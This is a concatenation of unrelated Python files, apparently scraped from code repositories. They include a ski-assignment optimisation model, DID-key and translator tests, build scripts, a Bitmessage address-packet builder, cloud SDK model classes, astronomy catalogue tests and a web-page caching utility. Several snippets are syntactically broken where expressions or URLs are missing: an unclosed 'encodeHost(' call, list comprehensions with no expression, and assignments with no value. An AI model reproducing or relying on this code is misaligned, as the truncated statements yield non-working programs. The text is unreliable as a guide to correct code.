<gh_stars>100-1000 """ Ski assignment in cpmpy From <NAME>, Jr.: PIC 60, Fall 2008 Final Review, December 12, 2008 ''' 5. Ski Optimization! Your job at Snapple is pleasant but in the winter you've decided to become a ski bum. You've hooked up with the Mount Baldy Ski Resort. They'll let you ski all winter for free in exchange for helping their ski rental shop with an algorithm to assign skis to skiers. Ideally, each skier should obtain a pair of skis whose height matches his or her own height exactly. Unfortunately, this is generally not possible. We define the disparity between a skier and his or her skis to be the absolute value of the difference between the height of the skier and the pair of skis. Our objective is to find an assignment of skis to skiers that minimizes the sum of the disparities. ... Illustrate your algorithm by explicitly filling out the A[i, j] table for the following sample data: * Ski heights: 1, 2, 5, 7, 13, 21. * Skier heights: 3, 4, 7, 11, 18. ''' This cpmpy model was written by <NAME> (<EMAIL>) See also my cpmpy page: """ from cpmpy import * import cpmpy.solvers import numpy as np from cpmpy_hakank import * def ski_assignment(): # data num_skis = 6 num_skiers = 5 ski_heights = [1, 2, 5, 7, 13, 21] skier_heights = [3, 4, 7, 11, 18] # which ski to choose for each skier x = intvar(0,num_skis-1,shape=num_skiers,name="x") z = intvar(0, sum(ski_heights), name="z") model = Model(minimize=z) # constraints model += [AllDifferent(x)] # model += [z == sum([abs(ski_heights[x[i]] - skier_heights[i]) for i in range(num_skiers)] )] model += [z == sum([abs(Element(ski_heights,x[i]) - skier_heights[i]) for i in range(num_skiers)] )] ss = CPM_ortools(model) num_solutions = 0 if ss.solve(): num_solutions += 1 print("total differences:", z.value()) for i in range(num_skiers): x_val = x[i].value() ski_height = ski_heights[x[i].value()] diff = ski_height - skier_heights[i] print('Skier %i: Ski %i with length %2i (diff: %2i)' %\ (i, x_val, ski_height, diff)) print() print() print('num_solutions:', num_solutions) return ss ss = ski_assignment()
<gh_stars>1000+ # pyflakes: disable-all from .api import * from .aug import * from .main import *
from unittest import TestCase from ...wallet.key_type import KeyType from ...wallet.util import b58_to_bytes from ..did_key import DIDKey, DID_KEY_RESOLVERS from .test_dids import ( DID_B<KEY>, ) TEST_BLS12381G1_BASE58_KEY = ( "<KEY>" ) TEST_BLS12381G1_FINGERPRINT = ( "<KEY>" ) TEST_BLS12381G1_DID = f"did:key:{TEST_BLS12381G1_FINGERPRINT}" TEST_BLS12381G1_KEY_ID = f"{TEST_BLS12381G1_DID}#{TEST_BLS12381G1_FINGERPRINT}" TEST_BLS12381G1_PREFIX_BYTES = b"".join( [b"\xea\x01", b58_to_bytes(TEST_BLS12381G1_BASE58_KEY)] ) class TestDIDKey(TestCase): def test_bls12381g1_from_public_key(self): key_bytes = b58_to_bytes(TEST_BLS12381G1_BASE58_KEY) did_key = DIDKey.from_public_key(key_bytes, KeyType.BLS12381G1) assert did_key.did == TEST_BLS12381G1_DID def test_bls12381g1_from_public_key_b58(self): did_key = DIDKey.from_public_key_b58( TEST_BLS12381G1_BASE58_KEY, KeyType.BLS12381G1 ) assert did_key.did == TEST_BLS12381G1_DID def test_bls12381g1_from_fingerprint(self): did_key = DIDKey.from_fingerprint(TEST_BLS12381G1_FINGERPRINT) assert did_key.did == TEST_BLS12381G1_DID assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY def test_bls12381g1_from_did(self): did_key = DIDKey.from_did(TEST_BLS12381G1_DID) assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY def test_bls12381g1_properties(self): did_key = DIDKey.from_did(TEST_BLS12381G1_DID) assert did_key.fingerprint == TEST_BLS12381G1_FINGERPRINT assert did_key.did == TEST_BLS12381G1_DID assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY assert did_key.public_key == b58_to_bytes(TEST_BLS12381G1_BASE58_KEY) assert did_key.key_type == KeyType.BLS12381G1 assert did_key.key_id == TEST_BLS12381G1_KEY_ID assert did_key.prefixed_public_key == TEST_BLS12381G1_PREFIX_BYTES def test_bls12381g1_diddoc(self): did_key = DIDKey.from_did(TEST_BLS12381G1_DID) resolver = DID_KEY_RESOLVERS[KeyType.BLS12381G1] assert resolver(did_key) == did_key.did_doc def test_bls12381g1_resolver(self): did_key = DIDKey.from_did(TEST_BLS12381G1_DID) resolver = DID_KEY_RESOLVERS[KeyType.BLS12381G1] did_doc = resolver(did_key) assert ( did_doc == DID_BLS12381G1_z3tEFALUKUzzCAvytMHX8X4SnsNsq6T5tC5Zb18oQEt1FqNcJXqJ3AA9umgzA9yoqPBeWA )
<gh_stars>100-1000 import argparse import json from pathlib import Path DS_VERSION = "2018.04.18" LOCAL_QANTA_PREFIX = "data/external/datasets/" QANTA_TRAIN_DATASET_PATH = f"qanta.train.{DS_VERSION}.json" QANTA_DEV_DATASET_PATH = f"{DS_VERSION}.json" QANTA_TEST_DATASET_PATH = f"qanta.test.{DS_VERSION}.json" def main(): parser = argparse.ArgumentParser() parser.add_argument('output_dir', type=str) args = parser.parse_args() output_dir = Path(args.output_dir) output_dir.mkdir(exist_ok=True, parents=True) for split, path in [('train', QANTA_TRAIN_DATASET_PATH), ('dev', QANTA_DEV_DATASET_PATH), ('test', QANTA_TEST_DATASET_PATH)]: with open(Path(LOCAL_QANTA_PREFIX) / path) as f: data = json.load(f) output = [] for q in data['questions']: output.append({'uid': q['qanta_id'], 'question': q['text'], 'answer': q['page'], 'context': ''}) with open(output_dir / f'qb-{split}-{DS_VERSION}.jsonl', 'w') as f: for r in output: f.write(f'{json.dumps(r)}\n') if __name__ == '__main__': main()
<filename>tests/ #!/usr/bin/env python """Tests for `deep_translator` package.""" from unittest.mock import patch import pytest import requests from deep_translator import MicrosoftTranslator, exceptions # mocked @patch.object(requests, "post") def test_microsoft_successful_post_mock(mock_request_post): returned_json = [{"translations": [{"text": "See you later!", "to": "en"}]}] def res(): r = requests.Response() def json_func(): return returned_json r.json = json_func return r mock_request_post.return_value = res() assert ( MicrosoftTranslator(api_key="an_api_key", source="de", target="en").translate( "auf wiedersehen!" ) == "See you later!" ) def test_MicrosoftAPIerror(): with pytest.raises(exceptions.MicrosoftAPIerror): MicrosoftTranslator(api_key="empty", source="de", target="en").translate("text") # the remaining tests are actual requests to Microsoft API and use an api key # if APIkey variable is None, they are skipped APIkey = None @pytest.mark.skipif(APIkey is None, reason="api_key is not provided") def test_microsoft_successful_post_onetarget(): posted = MicrosoftTranslator(api_key=APIkey, target="en").translate( "auf wiedersehen!" ) assert isinstance(posted, str) @pytest.mark.skipif(APIkey is None, reason="api_key is not provided") def test_microsoft_successful_post_twotargets(): posted = MicrosoftTranslator(api_key=APIkey, target=["en", "ru"]).translate( "auf wiedersehen!" ) assert isinstance(posted, str) @pytest.mark.skipif(APIkey is None, reason="api_key is not provided") def test_incorrect_target_attributes(): with pytest.raises(exceptions.ServerException): MicrosoftTranslator(api_key=APIkey, target="") with pytest.raises(exceptions.ServerException): MicrosoftTranslator(api_key="", target="nothing") @pytest.mark.skipif(APIkey is None, reason="api_key is not provided") def test_abbreviations(): m1 = MicrosoftTranslator(api_key=APIkey, source="en", target="fr") m2 = MicrosoftTranslator(api_key=APIkey, source="English", target="French") assert "".join(m1._source) == "".join(m2._source) assert "".join(m1._target) == "".join(m2._target)
<reponame>codyd51/axle<filename> #!/usr/bin/python3 import os import tempfile from pathlib import Path from typing import Tuple from build_utils import download_and_unpack_archive, run_and_check def clone_tool_and_prepare_build_dir(build_dir: Path, url: str) -> Tuple[Path, Path]: tool_src_dir = download_and_unpack_archive(build_dir, url) tool_name = url.split("/")[-1].removesuffix(".tar.gz") tool_build_dir = build_dir / f"build-{tool_name}" tool_build_dir.mkdir(exist_ok=True) return tool_src_dir, tool_build_dir def build() -> None: axle_dir = Path(__file__).parent sysroot_dir = axle_dir / "axle-sysroot" arch_target = "i686-elf" toolchain_dir = axle_dir / "i686-toolchain" binaries_dir = toolchain_dir / "bin" with tempfile.TemporaryDirectory() as build_dir_raw: build_dir = Path(build_dir_raw) build_products_dir = Path(__file__).parent / "newlib-build-products" if False: automake_src_dir, automake_build_dir = clone_tool_and_prepare_build_dir( build_dir, "" ) automake_configure_path = automake_src_dir / "configure" run_and_check( [automake_configure_path.as_posix(), f"--prefix={build_products_dir}"], cwd=automake_build_dir ) run_and_check(["make"], cwd=automake_build_dir) run_and_check(["make", "install"], cwd=automake_build_dir) autoconf_src_dir, autoconf_build_dir = clone_tool_and_prepare_build_dir( build_dir, "" ) autoconf_configure_path = autoconf_src_dir / "configure" run_and_check( [autoconf_configure_path.as_posix(), f"--prefix={build_products_dir}"], cwd=autoconf_build_dir ) run_and_check(["make"], cwd=autoconf_build_dir) run_and_check(["make", "install"], cwd=autoconf_build_dir) newlib_src_dir = axle_dir / "ports" / "newlib" / "newlib-" newlib_build_dir = build_dir / "build-newlib" newlib_build_dir.mkdir() os.symlink((binaries_dir / "i686-elf-ar").as_posix(), (newlib_build_dir / "i686-axle-ar").as_posix()) os.symlink((binaries_dir / "i686-elf-as").as_posix(), (newlib_build_dir / "i686-axle-as").as_posix()) os.symlink((binaries_dir / "i686-elf-gcc").as_posix(), (newlib_build_dir / "i686-axle-gcc").as_posix()) os.symlink((binaries_dir / "i686-elf-cc").as_posix(), (newlib_build_dir / "i686-axle-cc").as_posix()) os.symlink((binaries_dir / "i686-elf-ranlib").as_posix(), (newlib_build_dir / "i686-axle-ranlib").as_posix()) env = {"PATH": f'{newlib_build_dir}:{os.environ["PATH"]}'} newlib_configure_path = newlib_src_dir / "configure" run_and_check( [newlib_configure_path.as_posix(), "--prefix=/usr", "--target=i686-axle"], cwd=newlib_build_dir, env_additions=env, ) run_and_check(["make", "all"], cwd=newlib_build_dir, env_additions=env) run_and_check(["make", f"DESTDIR={sysroot_dir.as_posix()}", "install"], cwd=newlib_build_dir, env_additions=env) # If you make some kind of config change to the axle target, such as adding new files within the newlib port, # you may have to run this command # You may see an error like the following while running this script: # /bin/sh: /Users/philliptennen/Documents/develop/axle/ports/newlib/newlib- No such file or directory # ../newlib- --prefix=/usr --target=i686-axle # Fail when newlib doesn't compile # set -e # make all if __name__ == "__main__": build()
import sys prefix = sys.argv[1] fi = open(prefix + "/" + "test_results.tsv", "r") fo = open(prefix + "/" + "preds.txt", "w") fo.write("pairID,gold_label\n") counter = 0 labels = ["contradiction", "entailment", "neutral"] for line in fi: parts = [float(x) for x in line.strip().split("\t")] max_ind = 0 max_val = parts[0] for ind, part in enumerate(parts): if part > max_val: max_val = part max_ind = ind fo.write("ex" + str(counter) + "," + labels[max_ind] + "\n") counter += 1
# (C) Datadog, Inc. 2018 # All rights reserved # Licensed under Simplified BSD License (see LICENSE) from os.path import isfile def test_ok(aggregator, check, instance_ok): assert isfile(instance_ok['created_at_file']) check.check(instance_ok) aggregator.assert_service_check('system.reboot_required', status=check.OK) def test_not_present_ok(aggregator, check, instance_not_present): assert not isfile(instance_not_present['created_at_file']) check.check(instance_not_present) aggregator.assert_service_check('system.reboot_required', status=check.OK) def test_warning(aggregator, check, instance_warning): check.check(instance_warning) aggregator.assert_service_check('system.reboot_required', status=check.WARNING) def test_critical(aggregator, check, instance_critical): check.check(instance_critical) aggregator.assert_service_check('system.reboot_required', status=check.CRITICAL)
<gh_stars>1000+ """ Create bitmessage protocol command packets """ import struct import addresses from network.constants import MAX_ADDR_COUNT from network.node import Peer from protocol import CreatePacket, encodeHost def assemble_addr(peerList): """Create address command""" if isinstance(peerList, Peer): peerList = [peerList] if not peerList: return b'' retval = b'' for i in range(0, len(peerList), MAX_ADDR_COUNT): payload = addresses.encodeVarint(len(peerList[i:i + MAX_ADDR_COUNT])) for stream, peer, timestamp in peerList[i:i + MAX_ADDR_COUNT]: # 64-bit time payload += struct.pack('>Q', timestamp) payload += struct.pack('>I', stream) # service bit flags offered by this node payload += struct.pack('>q', 1) payload += encodeHost( # remote port payload += struct.pack('>H', peer.port) retval += CreatePacket('addr', payload) return retval
<gh_stars>100-1000 # coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at or Apache License 2.0 as shown at You may choose either license. from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401 from oci.decorators import init_model_state_from_kwargs @init_model_state_from_kwargs class QueryResultMetadataSummary(object): """ Summary containing the metadata about the query result set. """ def __init__(self, **kwargs): """ Initializes a new QueryResultMetadataSummary object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param query_result_row_type_summaries: The value to assign to the query_result_row_type_summaries property of this QueryResultMetadataSummary. :type query_result_row_type_summaries: list[oci.apm_traces.models.QueryResultRowTypeSummary] :param source_name: The value to assign to the source_name property of this QueryResultMetadataSummary. :type source_name: str :param query_results_grouped_by: The value to assign to the query_results_grouped_by property of this QueryResultMetadataSummary. :type query_results_grouped_by: list[oci.apm_traces.models.QueryResultsGroupedBySummary] :param query_results_ordered_by: The value to assign to the query_results_ordered_by property of this QueryResultMetadataSummary. :type query_results_ordered_by: list[oci.apm_traces.models.QueryResultsOrderedBySummary] :param time_series_interval_in_mins: The value to assign to the time_series_interval_in_mins property of this QueryResultMetadataSummary. :type time_series_interval_in_mins: int """ self.swagger_types = { 'query_result_row_type_summaries': 'list[QueryResultRowTypeSummary]', 'source_name': 'str', 'query_results_grouped_by': 'list[QueryResultsGroupedBySummary]', 'query_results_ordered_by': 'list[QueryResultsOrderedBySummary]', 'time_series_interval_in_mins': 'int' } self.attribute_map = { 'query_result_row_type_summaries': 'queryResultRowTypeSummaries', 'source_name': 'sourceName', 'query_results_grouped_by': 'queryResultsGroupedBy', 'query_results_ordered_by': 'queryResultsOrderedBy', 'time_series_interval_in_mins': 'timeSeriesIntervalInMins' } self._query_result_row_type_summaries = None self._source_name = None self._query_results_grouped_by = None self._query_results_ordered_by = None self._time_series_interval_in_mins = None @property def query_result_row_type_summaries(self): """ Gets the query_result_row_type_summaries of this QueryResultMetadataSummary. A collection of QueryResultRowTypeSummary objects that describe the type and properties of the individual row elements of the query rows being returned. The ith element in this list contains the QueryResultRowTypeSummary of the ith key value pair in the QueryResultRowData map. :return: The query_result_row_type_summaries of this QueryResultMetadataSummary. :rtype: list[oci.apm_traces.models.QueryResultRowTypeSummary] """ return self._query_result_row_type_summaries @query_result_row_type_summaries.setter def query_result_row_type_summaries(self, query_result_row_type_summaries): """ Sets the query_result_row_type_summaries of this QueryResultMetadataSummary. A collection of QueryResultRowTypeSummary objects that describe the type and properties of the individual row elements of the query rows being returned. The ith element in this list contains the QueryResultRowTypeSummary of the ith key value pair in the QueryResultRowData map. :param query_result_row_type_summaries: The query_result_row_type_summaries of this QueryResultMetadataSummary. :type: list[oci.apm_traces.models.QueryResultRowTypeSummary] """ self._query_result_row_type_summaries = query_result_row_type_summaries @property def source_name(self): """ Gets the source_name of this QueryResultMetadataSummary. Source of the query result set (traces, spans, etc). :return: The source_name of this QueryResultMetadataSummary. :rtype: str """ return self._source_name @source_name.setter def source_name(self, source_name): """ Sets the source_name of this QueryResultMetadataSummary. Source of the query result set (traces, spans, etc). :param source_name: The source_name of this QueryResultMetadataSummary. :type: str """ self._source_name = source_name @property def query_results_grouped_by(self): """ Gets the query_results_grouped_by of this QueryResultMetadataSummary. Columns or attributes of the query rows which are group by values. This is a list of ResultsGroupedBy summary objects, and the list will contain as many elements as the attributes and aggregate functions in the group by clause in the select query. :return: The query_results_grouped_by of this QueryResultMetadataSummary. :rtype: list[oci.apm_traces.models.QueryResultsGroupedBySummary] """ return self._query_results_grouped_by @query_results_grouped_by.setter def query_results_grouped_by(self, query_results_grouped_by): """ Sets the query_results_grouped_by of this QueryResultMetadataSummary. Columns or attributes of the query rows which are group by values. This is a list of ResultsGroupedBy summary objects, and the list will contain as many elements as the attributes and aggregate functions in the group by clause in the select query. :param query_results_grouped_by: The query_results_grouped_by of this QueryResultMetadataSummary. :type: list[oci.apm_traces.models.QueryResultsGroupedBySummary] """ self._query_results_grouped_by = query_results_grouped_by @property def query_results_ordered_by(self): """ Gets the query_results_ordered_by of this QueryResultMetadataSummary. Order by which the query results are organized. This is a list of queryResultsOrderedBy summary objects, and the list will contain more than one OrderedBy summary object, if the sort was multidimensional. :return: The query_results_ordered_by of this QueryResultMetadataSummary. :rtype: list[oci.apm_traces.models.QueryResultsOrderedBySummary] """ return self._query_results_ordered_by @query_results_ordered_by.setter def query_results_ordered_by(self, query_results_ordered_by): """ Sets the query_results_ordered_by of this QueryResultMetadataSummary. Order by which the query results are organized. This is a list of queryResultsOrderedBy summary objects, and the list will contain more than one OrderedBy summary object, if the sort was multidimensional. :param query_results_ordered_by: The query_results_ordered_by of this QueryResultMetadataSummary. :type: list[oci.apm_traces.models.QueryResultsOrderedBySummary] """ self._query_results_ordered_by = query_results_ordered_by @property def time_series_interval_in_mins(self): """ Gets the time_series_interval_in_mins of this QueryResultMetadataSummary. Interval for the time series function in minutes. :return: The time_series_interval_in_mins of this QueryResultMetadataSummary. :rtype: int """ return self._time_series_interval_in_mins @time_series_interval_in_mins.setter def time_series_interval_in_mins(self, time_series_interval_in_mins): """ Sets the time_series_interval_in_mins of this QueryResultMetadataSummary. Interval for the time series function in minutes. :param time_series_interval_in_mins: The time_series_interval_in_mins of this QueryResultMetadataSummary. :type: int """ self._time_series_interval_in_mins = time_series_interval_in_mins def __repr__(self): return formatted_flat_dict(self) def __eq__(self, other): if other is None: return False return self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other
class Queue(object): def __init__(self): self._list = [] def count(self): return len(self._list) def is_empty(self): return self.count() == 0 def enqueue(self, item): self._list.append(item) def dequeue(self): try: return self._list.pop(0) except IndexError: raise IndexError('pop from empty stack') def main(): queue = Queue() n = 100 print('Empty queue: {0}'.format(queue.is_empty())) while queue.count() < 5: print('pushing elements: {0}'.format(n)) queue.enqueue(n) n = n + 100 print('Number of items: {0}'.format(queue.count())) print('Empty queue: {0}'.format(queue.is_empty())) while True: try: print('Removing element: {0}'.format(queue.dequeue())) except Exception as e: print('Exception: {0}'.format(e)) break print('Number of items: {0}'.format(queue.count())) print('Empty queue: {0}'.format(queue.is_empty())) if __name__ == '__main__': main()
from inspect import Traceback from signal import getsignal, SIG_IGN, SIGINT, signal as signal_, Signals from types import FrameType from typing import Type class DelayedKeyboardInterrupt: def __init__(self, in_thread: bool = False) -> None: """ :param in_thread: Whether or not we're living in a thread or not """ self.in_thread = in_thread self.signal_received = None def __enter__(self) -> None: # When we're in a thread we can't use signal handling if not self.in_thread: self.signal_received = False self.old_handler = signal_(SIGINT, self.handler) def handler(self, sig: Signals, frame: FrameType) -> None: self.signal_received = (sig, frame) def __exit__(self, exc_type: Type, exc_val: Exception, exc_tb: Traceback) -> None: if not self.in_thread: signal_(SIGINT, self.old_handler) if self.signal_received: self.old_handler(*self.signal_received) class DisableKeyboardInterruptSignal: def __enter__(self) -> None: # Prevent signal from propagating to child process self._handler = getsignal(SIGINT) ignore_keyboard_interrupt() def __exit__(self, exc_type: Type, exc_val: Exception, exc_tb: Traceback) -> None: # Restore signal signal_(SIGINT, self._handler) def ignore_keyboard_interrupt(): signal_(SIGINT, SIG_IGN)
<filename>airbyte-integrations/bases/source-acceptance-test/source_acceptance_test/tests/ # # Copyright (c) 2021 Airbyte, Inc., all rights reserved. # import pytest from airbyte_cdk.models import Type from source_acceptance_test.base import BaseTest from source_acceptance_test.utils import ConnectorRunner, full_refresh_only_catalog, serialize @pytest.mark.default_timeout(20 * 60) class TestFullRefresh(BaseTest): def test_sequential_reads(self, connector_config, configured_catalog, docker_runner: ConnectorRunner, detailed_logger): configured_catalog = full_refresh_only_catalog(configured_catalog) output = docker_runner.call_read(connector_config, configured_catalog) records_1 = [ for message in output if message.type == Type.RECORD] output = docker_runner.call_read(connector_config, configured_catalog) records_2 = [ for message in output if message.type == Type.RECORD] output_diff = set(map(serialize, records_1)) - set(map(serialize, records_2)) if output_diff: msg = "The two sequential reads should produce either equal set of records or one of them is a strict subset of the other" detailed_logger.log_json_list(output_diff)
# Licensed under a 3-clause BSD style license - see LICENSE.rst from numpy.testing import assert_allclose, assert_equal import astropy.units as u from astropy.table import Table from gammapy.astro.population import ( add_observed_parameters, add_pulsar_parameters, add_pwn_parameters, add_snr_parameters, make_base_catalog_galactic, make_catalog_random_positions_cube, make_catalog_random_positions_sphere, ) def test_make_catalog_random_positions_cube(): table = make_catalog_random_positions_cube(random_state=0) d = table[0] assert len(table) == 100 assert len(table.colnames) == 3 assert table["x"].unit == "pc" assert_allclose(d["x"], 0.0976270078546495) assert table["y"].unit == "pc" assert_allclose(d["y"], 0.3556330735924602) assert table["z"].unit == "pc" assert_allclose(d["z"], -0.37640823601179485) table = make_catalog_random_positions_cube(dimension=2, random_state=0) assert_equal(table["z"], 0) table = make_catalog_random_positions_cube(dimension=1, random_state=0) assert_equal(table["y"], 0) assert_equal(table["z"], 0) def test_make_catalog_random_positions_sphere(): table = make_catalog_random_positions_sphere(random_state=0) d = table[0] assert len(table) == 100 assert len(table.colnames) == 3 assert table["lon"].unit == "rad" assert_allclose(d["lon"], 3.4482969442579128) assert table["lat"].unit == "rad" assert_allclose(d["lat"], 0.36359133530192267) assert table["distance"].unit == "pc" assert_allclose(d["distance"], 0.6780943487897606) def test_make_base_catalog_galactic(): table = make_base_catalog_galactic(n_sources=10, random_state=0) d = table[0] assert len(table) == 10 assert len(table.colnames) == 13 assert table["age"].unit == "yr" assert_allclose(d["age"], 548813.50392732478) assert table["n_ISM"].unit == "cm-3" assert_allclose(d["n_ISM"], 1.0) assert table["spiralarm"].unit is None assert d["spiralarm"] == "Crux Scutum" assert table["x_birth"].unit == "kpc" assert_allclose(d["x_birth"], -5.856461, atol=1e-5) assert table["y_birth"].unit == "kpc" assert_allclose(d["y_birth"], 3.017292, atol=1e-5) assert table["z_birth"].unit == "kpc" assert_allclose(d["z_birth"], 0.049088, atol=1e-5) assert table["x"].unit == "kpc" assert_allclose(d["x"], -5.941061, atol=1e-5) assert table["y"].unit == "kpc" assert_allclose(d["y"], 3.081642, atol=1e-5) assert table["z"].unit == "kpc" assert_allclose(d["z"], 0.023161, atol=1e-5) assert table["vx"].unit == "km/s" assert_allclose(d["vx"], -150.727104, atol=1e-5) assert table["vy"].unit == "km/s" assert_allclose(d["vy"], 114.648494, atol=1e-5) assert table["vz"].unit == "km/s" assert_allclose(d["vz"], -46.193814, atol=1e-5) assert table["v_abs"].unit == "km/s" assert_allclose(d["v_abs"], 194.927693, atol=1e-5) def test_add_snr_parameters(): table = Table() table["age"] = [100, 1000] * u.yr table["n_ISM"] = u.Quantity(1, "cm-3") table = add_snr_parameters(table) assert len(table) == 2 assert table.colnames == ["age", "n_ISM", "E_SN", "r_out", "r_in", "L_SNR"] assert table["E_SN"].unit == "erg" assert_allclose(table["E_SN"], 1e51) assert table["r_out"].unit == "pc" assert_allclose(table["r_out"], [1, 3.80730787743]) assert table["r_in"].unit == "pc" assert_allclose(table["r_in"], [0.9086, 3.45931993743]) assert table["L_SNR"].unit == "1 / s" assert_allclose(table["L_SNR"], [0, 1.0768e33]) def test_add_pulsar_parameters(): table = Table() table["age"] = [100, 1000] * u.yr table = add_pulsar_parameters(table, random_state=0) assert len(table) == 2 assert len(table.colnames) == 10 assert table["age"].unit == "yr" assert_allclose(table["age"], [100, 1000]) assert table["P0"].unit == "s" assert_allclose(table["P0"], [0.214478, 0.246349], atol=1e-5) assert table["P1"].unit == "" assert_allclose(table["P1"], [6.310423e-13, 4.198294e-16], atol=1e-5) assert table["P0_birth"].unit == "s" assert_allclose(table["P0_birth"], [0.212418, 0.246336], atol=1e-5) assert table["P1_birth"].unit == "" assert_allclose(table["P1_birth"], [6.558773e-13, 4.199198e-16], atol=1e-5) assert table["CharAge"].unit == "yr" assert_allclose(table["CharAge"], [2.207394e-21, 1.638930e-24], atol=1e-5) assert table["Tau0"].unit == "yr" assert_allclose(table["Tau0"], [5.131385e03, 9.294538e06], atol=1e-5) assert table["L_PSR"].unit == "erg / s" assert_allclose(table["L_PSR"], [2.599229e36, 1.108788e33], rtol=1e-5) assert table["L0_PSR"].unit == "erg / s" assert_allclose(table["L0_PSR"], [2.701524e36, 1.109026e33], rtol=1e-5) assert table["B_PSR"].unit == "G" assert_allclose(table["B_PSR"], [1.194420e13, 3.254597e11], rtol=1e-5) def test_add_pwn_parameters(): table = make_base_catalog_galactic(n_sources=10, random_state=0) # To compute PWN parameters we need PSR and SNR parameters first table = add_snr_parameters(table) table = add_pulsar_parameters(table, random_state=0) table = add_pwn_parameters(table) d = table[0] assert len(table) == 10 assert len(table.colnames) == 27 assert table["r_out_PWN"].unit == "pc" assert_allclose(d["r_out_PWN"], 1.378224, atol=1e-4) def test_add_observed_parameters(): table = make_base_catalog_galactic(n_sources=10, random_state=0) table = add_observed_parameters(table) d = table[0] assert len(table) == 10 assert len(table.colnames) == 20 assert table["distance"].unit == "pc" assert_allclose(d["distance"], 13016.572756, atol=1e-5) assert table["GLON"].unit == "deg" assert_allclose(d["GLON"], -27.156565, atol=1e-5) assert table["GLAT"].unit == "deg" assert_allclose(d["GLAT"], 0.101948, atol=1e-5) assert table["VGLON"].unit == "deg / Myr" assert_allclose(d["VGLON"], 0.368166, atol=1e-5) assert table["VGLAT"].unit == "deg / Myr" assert_allclose(d["VGLAT"], -0.209514, atol=1e-5) assert table["RA"].unit == "deg" assert_allclose(d["RA"], 244.347149, atol=1e-5) assert table["DEC"].unit == "deg" assert_allclose(d["DEC"], -50.410142, atol=1e-5) def test_chain_all(): # Test that running the simulation functions in chain works table = make_base_catalog_galactic(n_sources=10, random_state=0) table = add_snr_parameters(table) table = add_pulsar_parameters(table, random_state=0) table = add_pwn_parameters(table) table = add_observed_parameters(table) d = table[0] # Note: the individual functions are tested above. # Here we just run them in a chain and do very basic asserts # on the output so that we make sure we notice changes. assert len(table) == 10 assert len(table.colnames) == 34 assert table["r_out_PWN"].unit == "pc" assert_allclose(d["r_out_PWN"], 1.378224, atol=1e-4) assert table["RA"].unit == "deg" assert_allclose(d["RA"], 244.347149, atol=1e-5)
<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- import urllib, urllib2, urlparse, socket import json, sys, os, hashlib, subprocess, time from blacklist import BLACKLIST BASEDIR = os.path.dirname(os.path.realpath(os.path.join(__file__, '..'))) class WebpageCache(object): def __init__(self, basedir=BASEDIR, dirname='web.cache', log=True, timeout=15): self.cachePath = os.path.join(basedir, dirname) if not os.path.exists(self.cachePath): os.mkdir(self.cachePath) self.log = log self.cache_miss = False self.timeout = timeout def get_hashcode(self, url): return hashlib.sha1(url).hexdigest() def get_path(self, url, already_hashed=False): if not already_hashed: url = self.get_hashcode(url) return os.path.join(self.cachePath, url) def get_current_datetime(self): return time.strftime("%Y-%m-%d-%H-%M-%S", time.gmtime()) def open_in_browser(self, hashcode, browser="firefox"): path = os.path.join(self.cachePath, hashcode)[browser, path]) def comment(self, url): return ' '.join(('<!--', urllib.quote(url), self.get_current_datetime(), '-->\n')) def read(self, url, already_hashed=False): path = self.get_path(url, already_hashed) if os.path.exists(path): with open(path) as fin: error = False check_url = fin.readline().strip() if check_url == 'ERROR': error = True error_message = fin.readline().strip() check_url = fin.readline() if not already_hashed: tokens = check_url.split() assert len(tokens) > 2 and tokens[1] == urllib.quote(url), path if error: return WebLoadingError(error_message) else: return def write(self, url, content, already_hashed=False): path = self.get_path(url, already_hashed) with open(path, 'w') as fout: fout.write(self.comment(url)) fout.write(content) def write_error(self, url, error, already_hashed=False): path = self.get_path(url, already_hashed) with open(path, 'w') as fout: fout.write('ERROR\n') fout.write(error.replace('\n', ' ') + '\n') fout.write(self.comment(url)) def get_page(self, url, force=False, check_html=True): result = if result and not force: self.cache_miss = False if isinstance(result, WebLoadingError): if self.log: print >> sys.stderr, '[ERROR]', result result = None else: self.cache_miss = True try: if self.log: print >> sys.stderr, 'Downloading from', url, '...' # Check blacklist parsed_url = urlparse.urlparse(url) if parsed_url.netloc in BLACKLIST: raise WebLoadingError('URL %s in blacklist' % url) # Open web page opener = urllib2.build_opener() opener.addheaders = [ ('User-agent', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0)')] response =, timeout=self.timeout) # Check content type to prevent non-HTML content_type = if check_html and content_type != 'text/html': raise WebLoadingError("Non-HTML response: %s" % content_type) result = self.write(url, result) except Exception, e: if self.log: print >> sys.stderr, '[ERROR] ', e if isinstance(e, (WebLoadingError, urllib2.URLError, socket.error)): self.write_error(url, str(e.message)) result = None if self.log: if self.cache_miss: print >> sys.stderr, 'Retrieved "%s"' % url else: print >> sys.stderr, ('Loaded "%s" from cache (%s)' % (url, self.get_path(url))) return result ################################################################ # GOOGLE SUGGEST GOOGLE_SUGGEST_URL = '' def get_google_suggest_url(self, before, after=''): answer = self.GOOGLE_SUGGEST_URL + urllib.quote(before) + urllib.quote(after) if after: answer += '&cp=' + str(len(before)) return answer def get_from_google_suggest(self, before, after=''): url = self.get_google_suggest_url(before, after) return json.loads(self.get_page(url, check_html=False))[1] ################################################################ # GOOGLE SEARCH -- old API # The important fields of each result are # - url (+ unescapedUrl, visibleUrl, cacheUrl) # - titleNoFormatting (+ title) # - content GOOGLE_SEARCH_URL = '' def get_google_search_url(self, keyword): answer = self.GOOGLE_SEARCH_URL + urllib.quote(keyword) return answer def get_from_google_search(self, keyword, raw=False): url = self.get_google_search_url(keyword) result = self.get_page(url, check_html=False) if raw: return result return json.loads(result) def get_urls_from_google_search(self, keyword): results = self.get_from_google_search(keyword)['responseData']['results'] return [(x['unescapedUrl'], x['titleNoFormatting']) for x in results] GOOGLE_PAUSE = 30 def get_from_google_search_with_backoff(self, keyword): url = self.get_google_search_url(keyword) result = self.get_page(url, check_html=False) while True: try: return json.loads(result)['responseData']['results'] except: # Google nailed me! Exponential backoff! print >> sys.stderr, ('Hide from Google for %d seconds ...' % 